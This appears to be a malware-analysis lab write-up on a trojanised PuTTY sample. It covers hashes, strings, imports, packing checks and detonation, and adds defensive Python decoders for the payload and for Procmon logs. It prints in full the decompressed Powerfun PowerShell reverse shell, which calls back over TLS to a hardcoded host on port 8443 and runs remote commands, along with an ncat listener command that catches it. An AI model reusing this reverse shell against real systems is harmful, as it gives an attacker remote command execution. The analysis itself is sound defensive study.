What is the SHA256 hash of the sample?
0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83
What architecture is this binary?
x86 (32-bit)

Are there any results from submitting the SHA256 hash to VirusTotal?

Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?
Nothing interesting can be extracted from the strings. Any malicious strings are either drowned in the flood of legitimate strings that come with the PuTTY software, or hidden because the sample is likely packed or otherwise obfuscated. (see Strings)
Describe the results of inspecting the IAT for this binary. Are there any imports worth noting?
PEStudio flags a number of imports, but given PuTTY's normal functionality as a network client none of them stands out as suspicious on its own. (see IAT)
Is it likely that this binary is packed?
The Raw and Virtual sizes are almost identical (the raw size is 4 bytes larger, which is just file-alignment padding), so the section sizes alone are not evidence of packing. The suspicion rests on capa's packer heuristic below and on the absence of meaningful strings; taken together, the binary is most likely packed or carries an obfuscated payload.
| Raw size (bytes) | Virtual size (bytes) |
|---|---|
| 169472 | 169468 |
WARNING:capa:--------------------------------------------------------------------------------
WARNING:capa: This sample appears to be packed.
WARNING:capa:
WARNING:capa: Packed samples have often been obfuscated to hide their logic.
WARNING:capa: capa cannot handle obfuscation well. This means the results may be misleading or incomplete.
WARNING:capa: If possible, you should try to unpack this input file before analyzing it with capa.
WARNING:capa:
WARNING:capa: Identified via rule: (internal) packer file limitation
WARNING:capa:
WARNING:capa: Use -v or -vv if you really want to see the capabilities identified by capa.
WARNING:capa:--------------------------------------------------------------------------------
Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?
Both with and without internet simulation, the binary launches a PowerShell window at detonation.

From the host-based indicators perspective, what is the main payload that is initiated at detonation? What tool can you use to identify this?
Using Procmon's process tree, we can identify a powershell.exe child process spawned by the sample; the network events attached to that PowerShell process show that it, not putty.exe, initiates the outbound connection, so PowerShell is the main payload.

What is the DNS record that is queried at detonation?
Using Wireshark without an internet simulator, we can easily intercept the DNS query for bonus2.corporatebonusapplication.local. The same record can be recovered on the host side: the powershell.exe command line carries a GZip-compressed payload, and once decompressed it is the Powerfun reverse shell by Ben Turner and Dave Hardy, with the callback host and port hardcoded in the TCPClient call:

```powershell
# Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
    # WebClient that reuses the current user's default and proxy credentials
    $wc = New-Object -TypeName Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}
function powerfun
{
    Param(
        [String]$Command,
        [String]$Sslcon,
        [String]$Download
    )
    Process {
        $modules = @()
        # "bind": listen on 8443 and wait for the operator to connect
        if ($Command -eq "bind")
        {
            $listener = [System.Net.Sockets.TcpListener]8443
            $listener.start()
            $client = $listener.AcceptTcpClient()
        }
        # "reverse": call back to the hardcoded C2 name on 8443
        if ($Command -eq "reverse")
        {
            $client = New-Object System.Net.Sockets.TCPClient("bonus2.corporatebonusapplication.local",8443)
        }
        $stream = $client.GetStream()
        # Wrap the TCP stream in TLS; the {$True} callback accepts any server certificate
        if ($Sslcon -eq "true")
        {
            $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
            $sslStream.AuthenticateAsClient("bonus2.corporatebonusapplication.local")
            $stream = $sslStream
        }
        [byte[]]$bytes = 0..20000|%{0}
        # Fake PowerShell banner with username and hostname, sent to the operator
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)
        if ($Download -eq "true")
        {
            $sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
            $stream.Write($sendbytes,0,$sendbytes.Length)
            ForEach ($module in $modules)
            {
                (Get-Webclient).DownloadString($module)|Invoke-Expression
            }
        }
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)
        # Command loop: read a line from the operator, Invoke-Expression it, return output plus prompt
        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()
        }
        $client.Close()
        $listener.Stop()
    }
}
# The sample invokes the reverse mode with TLS enabled
powerfun -Command reverse -Sslcon true
```

The decompressed script is also kept on its own sub-page: https://zhou-efr.notion.site/Powerfun-Written-by-Ben-Turner-Dave-Hardy-function-Get-Webclient-wc-New-Object-TypeN-71594b2924294030939ebffec450fcd9
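The host-side recovery described above (decompress the PowerShell payload from the process command line, then read the callback host and port out of the script) can be scripted for triage. The following is an added example, not code from the original write-up or from the Powerfun authors. It assumes the GZip payload is wrapped in Base64 inside a FromBase64String('...') argument (the write-up only states that the payload is GZip compressed), and the command line it decodes is constructed here from a fragment of the Powerfun script; a real command line would be copied from Procmon's Process Create detail. It goes slightly beyond the page by also handling the plain -EncodedCommand (UTF-16LE) loader shape.

```python
"""Decode a PowerShell loader command line and extract C2 indicators.

Added example, not part of the original write-up. Assumptions: the GZip payload
is Base64-wrapped in FromBase64String('...'); the sample command line below is
constructed from a fragment of the Powerfun script, not captured from the sample.
"""
import base64
import gzip
import re

# Fragment of the decompressed Powerfun script, used only to build a sample.
POWERFUN_FRAGMENT = b"""function powerfun {
  if ($Command -eq "bind") { $listener = [System.Net.Sockets.TcpListener]8443 }
  if ($Command -eq "reverse") {
    $client = New-Object System.Net.Sockets.TCPClient("bonus2.corporatebonusapplication.local",8443)
  }
  $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
  $sslStream.AuthenticateAsClient("bonus2.corporatebonusapplication.local")
}
powerfun -Command reverse -Sslcon true
"""


def build_sample_cmdline(script: bytes) -> str:
    """Constructed stand-in for the powershell.exe command line seen in Procmon:
    gzip + Base64 payload fed through a GzipStream/StreamReader pipeline."""
    blob = base64.b64encode(gzip.compress(script)).decode()
    return (
        'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create('
        "(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream("
        f"(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('{blob}'))),"
        '[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"'
    )


def build_sample_encoded_command(script: str) -> str:
    """Constructed stand-in for the other common loader shape: -EncodedCommand."""
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(script.encode("utf-16-le")).decode()


B64_ARG_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
ENC_CMD_RE = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
GZIP_MAGIC = b"\x1f\x8b"


def decode_payload(cmdline: str) -> str:
    """Return the plaintext script hidden in a PowerShell command line.

    Handles a gzip blob inside FromBase64String('..') (UTF-8 once inflated)
    and a plain -EncodedCommand argument (UTF-16LE)."""
    m = B64_ARG_RE.search(cmdline)
    if m:
        raw = base64.b64decode(m.group(1))
        if raw.startswith(GZIP_MAGIC):
            raw = gzip.decompress(raw)
        return raw.decode("utf-8", errors="replace")
    m = ENC_CMD_RE.search(cmdline)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    raise ValueError("no Base64 payload found on the command line")


C2_RE = re.compile(r'TCPClient\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)', re.IGNORECASE)
BIND_RE = re.compile(r"TcpListener\]\s*(\d+)", re.IGNORECASE)


def extract_indicators(script: str) -> dict:
    """Pull callback host/port, bind port and TLS use out of the decoded script."""
    ind = {"c2_host": None, "c2_port": None, "bind_port": None,
           "tls": "SslStream" in script}
    m = C2_RE.search(script)
    if m:
        ind["c2_host"], ind["c2_port"] = m.group(1), int(m.group(2))
    m = BIND_RE.search(script)
    if m:
        ind["bind_port"] = int(m.group(1))
    return ind


if __name__ == "__main__":
    cmdline = build_sample_cmdline(POWERFUN_FRAGMENT)
    print(extract_indicators(decode_payload(cmdline)))
```

The gzip magic check matters: the same FromBase64String pipeline is used by loaders that skip compression, and decompressing a non-gzip blob would raise instead of yielding the script.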

What is the callback port number at detonation?
Using Wireshark again, we can see the connection attempt to port 8443. The same port is visible in the decoded PowerShell script (the TCPClient call) and in process analysis with Procmon or TCPView.


What is the callback protocol at detonation?
TCP. The callback is a TCP connection to port 8443 that the script wraps in TLS via SslStream, with server certificate validation disabled by the {$True} callback (see answer above).
How can you use host-based telemetry to identify the DNS record, port, and protocol?
Procmon (the TCP Connect and UDP Send events attributed to the powershell.exe process show the protocol, destination host and port) and TCPView (a live view of the process's open connections).
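The Procmon side of this can be automated from a CSV export (File > Save > CSV): tie the powershell.exe process back to putty.exe through the Process Create event, then list the network operations attributed to it. The following is an added example, not code from the original write-up. The CSV is constructed to mirror what Procmon shows for this sample and is not a real capture; it assumes "Resolve network addresses" was enabled so the TCP Connect path carries the hostname, and that ports are displayed numerically.

```python
"""Extract callback indicators for a process tree from a Procmon CSV export.

Added example, not part of the original write-up. PROCMON_CSV is constructed,
not a real capture. Assumptions: Procmon resolved network addresses (hostname
in the TCP Connect path) and shows numeric ports.
"""
import csv
import io
import re

PROCMON_CSV = r"""
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:42:01.1234567 AM","putty.exe","4120","Process Create","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","SUCCESS","PID: 5236, Command line: powershell.exe -nop -w hidden -noni -ep bypass (payload omitted)"
"10:42:02.5551234 AM","powershell.exe","5236","UDP Send","FLARE-VM:62342 -> 10.0.0.2:53","SUCCESS","Length: 56"
"10:42:02.5601234 AM","powershell.exe","5236","UDP Receive","FLARE-VM:62342 -> 10.0.0.2:53","SUCCESS","Length: 72"
"10:42:02.6001234 AM","powershell.exe","5236","TCP Connect","FLARE-VM:49712 -> bonus2.corporatebonusapplication.local:8443","SUCCESS","Length: 0, mss: 1460, sackopt: 1, tsopt: 0, wsopt: 1, rcvwin: 64240, rcvwinscale: 8, sndwinscale: 8, seqnum: 0, connid: 0"
"10:42:03.1001234 AM","svchost.exe","1104","UDP Send","FLARE-VM:5353 -> 224.0.0.251:5353","SUCCESS","Length: 45"
""".strip()

# Procmon puts the child PID and command line in the Detail column of Process Create.
PROCESS_CREATE_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)")


def load_events(csv_text: str) -> list:
    return list(csv.DictReader(io.StringIO(csv_text)))


def process_tree(events: list, root_name: str) -> set:
    """PIDs of every root_name process plus everything created under them."""
    children = {}
    for e in events:
        if e["Operation"] == "Process Create":
            m = PROCESS_CREATE_RE.match(e["Detail"])
            if m:
                children.setdefault(e["PID"], []).append(m.group(1))
    tracked = {e["PID"] for e in events if e["Process Name"].lower() == root_name.lower()}
    queue = list(tracked)
    while queue:
        pid = queue.pop()
        for child in children.get(pid, []):
            if child not in tracked:
                tracked.add(child)
                queue.append(child)
    return tracked


def network_indicators(csv_text: str, root_name: str = "putty.exe") -> dict:
    """Map (process, protocol, remote host, remote port) -> Procmon operations
    seen, restricted to the root process and its descendants."""
    events = load_events(csv_text)
    pids = process_tree(events, root_name)
    found = {}
    for e in events:
        op = e["Operation"]
        if e["PID"] not in pids or op[:4] not in ("TCP ", "UDP "):
            continue
        _local, _, remote = e["Path"].partition(" -> ")
        host, _, port = remote.rpartition(":")
        key = (e["Process Name"], op[:3], host, int(port) if port.isdigit() else port)
        found.setdefault(key, []).append(op[4:])
    return found


def describe(indicators: dict) -> list:
    """Triage lines. A UDP flow to port 53 only proves the process asked the
    resolver; Procmon does not record the queried name, so take it from the
    resolved TCP Connect path or from the Wireshark DNS capture."""
    lines = []
    for (proc, proto, host, port), ops in indicators.items():
        note = " (DNS lookup; queried name not recorded by Procmon)" if proto == "UDP" and port == 53 else ""
        lines.append(f"{proc}: {proto} -> {host}:{port} [{', '.join(sorted(set(ops)))}]{note}")
    return lines


if __name__ == "__main__":
    for line in describe(network_indicators(PROCMON_CSV)):
        print(line)
```

Filtering by the process tree rather than by process name is what keeps unrelated noise (the svchost.exe mDNS traffic in the sample) out of the indicator list while still catching a child that the sample spawned under a benign-looking name.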
Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?
By analysing the code, we see that the shell wraps its connection in TLS (SslStream with AuthenticateAsClient), so a plain TCP listener never completes the handshake. Adding the --ssl flag to the ncat listener lets it accept the connection; the hostname bonus2.corporatebonusapplication.local must also resolve to the listening host (through the internet simulator's fake DNS or a hosts-file entry). Because the script's certificate-validation callback always returns $True, ncat's temporary self-signed certificate is accepted and the shell spawns.

```shell
ncat -nvlp 8443 --ssl
```